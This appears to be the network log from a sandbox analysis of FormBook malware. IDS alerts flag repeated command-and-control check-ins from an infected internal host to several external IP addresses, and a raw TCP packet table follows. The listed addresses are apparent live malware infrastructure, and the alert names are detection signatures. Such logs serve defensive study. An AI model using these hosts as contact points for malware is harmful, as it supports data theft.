2024-09-11T22:03:34.587409+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49717 | 193.108.130.23 | 80 | TCP
2024-09-11T22:03:37.144072+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49718 | 193.108.130.23 | 80 | TCP
2024-09-11T22:03:39.725437+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49719 | 193.108.130.23 | 80 | TCP
2024-09-11T22:03:42.170263+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49720 | 193.108.130.23 | 80 | TCP
2024-09-11T22:03:48.831925+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49721 | 47.239.13.172 | 80 | TCP
2024-09-11T22:03:51.334838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49722 | 47.239.13.172 | 80 | TCP
2024-09-11T22:03:53.999481+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49723 | 47.239.13.172 | 80 | TCP
2024-09-11T22:03:56.395789+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49724 | 47.239.13.172 | 80 | TCP
2024-09-11T22:04:04.315698+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49725 | 154.213.157.32 | 80 | TCP
2024-09-11T22:04:06.849751+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49726 | 154.213.157.32 | 80 | TCP
2024-09-11T22:04:09.377961+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49727 | 154.213.157.32 | 80 | TCP
2024-09-11T22:04:31.770471+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49728 | 154.213.157.32 | 80 | TCP
2024-09-11T22:04:38.312957+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49729 | 47.239.13.172 | 80 | TCP
2024-09-11T22:04:40.850212+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49730 | 47.239.13.172 | 80 | TCP
2024-09-11T22:04:43.622662+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49731 | 47.239.13.172 | 80 | TCP
2024-09-11T22:04:45.907910+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49732 | 47.239.13.172 | 80 | TCP
2024-09-11T22:04:51.625711+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49733 | 91.195.240.19 | 80 | TCP
2024-09-11T22:04:54.155382+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49734 | 91.195.240.19 | 80 | TCP
2024-09-11T22:04:56.682829+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49735 | 91.195.240.19 | 80 | TCP
2024-09-11T22:04:59.223467+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49736 | 91.195.240.19 | 80 | TCP
2024-09-11T22:05:05.474119+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49737 | 198.12.241.35 | 80 | TCP
2024-09-11T22:05:08.549097+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49738 | 198.12.241.35 | 80 | TCP
2024-09-11T22:05:10.877753+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49739 | 198.12.241.35 | 80 | TCP
2024-09-11T22:05:13.260346+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49740 | 198.12.241.35 | 80 | TCP
2024-09-11T22:05:18.997419+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49741 | 91.195.240.19 | 80 | TCP
2024-09-11T22:05:21.677864+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49742 | 91.195.240.19 | 80 | TCP
2024-09-11T22:05:24.030304+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49743 | 91.195.240.19 | 80 | TCP
2024-09-11T22:05:26.773021+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49744 | 91.195.240.19 | 80 | TCP
2024-09-11T22:05:41.799821+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49745 | 31.186.11.254 | 80 | TCP
2024-09-11T22:05:44.974968+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49746 | 31.186.11.254 | 80 | TCP
2024-09-11T22:05:47.502944+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49747 | 31.186.11.254 | 80 | TCP
2024-09-11T22:06:09.903190+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49748 | 31.186.11.254 | 80 | TCP
2024-09-11T22:06:15.495299+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49749 | 192.250.231.28 | 80 | TCP
2024-09-11T22:06:18.793022+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49750 | 192.250.231.28 | 80 | TCP
2024-09-11T22:06:21.178494+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49751 | 192.250.231.28 | 80 | TCP
2024-09-11T22:06:23.712219+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49752 | 192.250.231.28 | 80 | TCP
2024-09-11T22:06:30.426319+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49753 | 47.239.13.172 | 80 | TCP
2024-09-11T22:06:32.914154+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49754 | 47.239.13.172 | 80 | TCP
2024-09-11T22:06:35.474379+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49755 | 47.239.13.172 | 80 | TCP
2024-09-11T22:06:37.962678+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49756 | 47.239.13.172 | 80 | TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 11, 2024 22:03:10.994669914 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994679928 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.994724035 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.999597073 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999641895 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999654055 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999680996 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.049292088 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.081248999 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081275940 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081362963 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081475019 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.081475019 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.910669088 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.927534103 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.932738066 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:12.932879925 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.934895039 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.939829111 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538608074 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538667917 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538703918 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538749933 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538784027 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538814068 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538846970 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538878918 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538911104 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538921118 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.538921118 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.538948059 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538969994 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.539041042 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.543836117 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543900967 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543935061 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543971062 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.543977022 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.544075012 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.640767097 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.640805006 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.640819073 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.641236067 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.643815994 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.648560047 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:19.290463924 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.295568943 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.295658112 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.297724009 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:19.302648067 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.921907902 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.921993017 CEST804971391.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:19.922112942 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:20.799472094 CEST4971380192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.822494030 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.827776909 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:21.827893019 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.832238913 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:21.837368011 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474281073 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474526882 CEST804971491.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:22.474600077 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:23.346399069 CEST4971480192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.366425037 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.662954092 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:24.663149118 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.665750980 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:24.670763016 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:24.670875072 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415575027 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415776014 CEST804971591.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:25.415863037 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:26.174576998 CEST4971580192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.193115950 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.198112011 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.198227882 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.200853109 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.205774069 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843063116 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843163013 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:27.843431950 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.852202892 CEST4971680192.168.2.1091.184.0.111
                                                          Sep 11, 2024 22:03:27.857146978 CEST804971691.184.0.111192.168.2.10
                                                          Sep 11, 2024 22:03:33.549061060 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.553972006 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:33.554085970 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.556015015 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:33.560873985 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587290049 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587312937 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587327957 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587376118 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587404966 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587409019 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587430954 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587440014 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587446928 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587464094 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587471962 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587480068 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587493896 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.587523937 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.587548971 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:34.588038921 CEST8049717193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:34.590975046 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:35.065637112 CEST4971780192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.087734938 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.092735052 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:36.092818022 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.094854116 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:36.099731922 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143892050 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143923998 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143942118 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143956900 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143982887 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.143997908 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144015074 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144028902 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144053936 CEST8049718193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:37.144072056 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.144107103 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.144121885 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:37.596472979 CEST4971880192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.616827965 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.621962070 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:38.622049093 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.624823093 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:38.629720926 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:38.629756927 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725352049 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725377083 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725387096 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725397110 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725406885 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725416899 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725428104 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725442886 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725436926 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:39.725519896 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:39.725817919 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725857019 CEST8049719193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:39.725912094 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:40.127810001 CEST4971980192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.146626949 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.151690006 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:41.151789904 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.153753996 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:41.158965111 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170047998 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170073986 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:42.170263052 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:42.173199892 CEST4972080192.168.2.10193.108.130.23
                                                          Sep 11, 2024 22:03:42.178057909 CEST8049720193.108.130.23192.168.2.10
                                                          Sep 11, 2024 22:03:47.893899918 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.899576902 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:47.899647951 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.902614117 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:47.907407999 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831069946 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831166983 CEST804972147.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:48.831924915 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:49.408838034 CEST4972180192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.427730083 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.432698011 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:50.432818890 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.434772968 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:50.439821959 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334691048 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334779978 CEST804972247.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:51.334837914 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:51.940064907 CEST4972280192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.958580971 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.964344978 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:52.967355013 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.969449043 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:52.974972010 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:52.975099087 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999375105 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999433041 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999444962 CEST804972347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:53.999480963 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:53.999516010 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:54.471396923 CEST4972380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.489850998 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.494976044 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:55.495083094 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.497061014 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:55.502000093 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395628929 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395741940 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:03:56.395788908 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:56.398690939 CEST4972480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:03:56.403521061 CEST804972447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:04:02.798827887 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.803716898 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:02.804987907 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.810854912 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:02.815767050 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:04.315697908 CEST4972580192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:04.364603996 CEST8049725154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:05.334836006 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.340046883 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:05.342937946 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.346828938 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:05.351845026 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:06.849750996 CEST4972680192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:06.896420956 CEST8049726154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.866117001 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.871114016 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.871243000 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.873356104 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:07.878268003 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:07.878298044 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:09.377960920 CEST4972780192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:09.426033020 CEST8049727154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:10.397391081 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:10.402308941 CEST8049728154.213.157.32192.168.2.10
                                                          Sep 11, 2024 22:04:10.402369976 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:04:10.404664993 CEST4972880192.168.2.10154.213.157.32
                                                          Sep 11, 2024 22:06:22.174899101 CEST4975180192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.193321943 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.198278904 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.198362112 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.200354099 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.205152035 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.711595058 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712097883 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712110996 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:23.712219000 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.712264061 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.714905977 CEST4975280192.168.2.10192.250.231.28
                                                          Sep 11, 2024 22:06:23.720269918 CEST8049752192.250.231.28192.168.2.10
                                                          Sep 11, 2024 22:06:29.472975016 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.478352070 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:29.478456974 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.481215954 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:29.486073971 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426184893 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426208973 CEST804975347.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:30.426318884 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:30.989314079 CEST4975380192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.005902052 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.011015892 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.013086081 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.013145924 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:32.018007040 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.913976908 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.914096117 CEST804975447.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:32.914154053 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:33.518467903 CEST4975480192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.537472010 CEST4975580192.168.2.1047.239.13.172
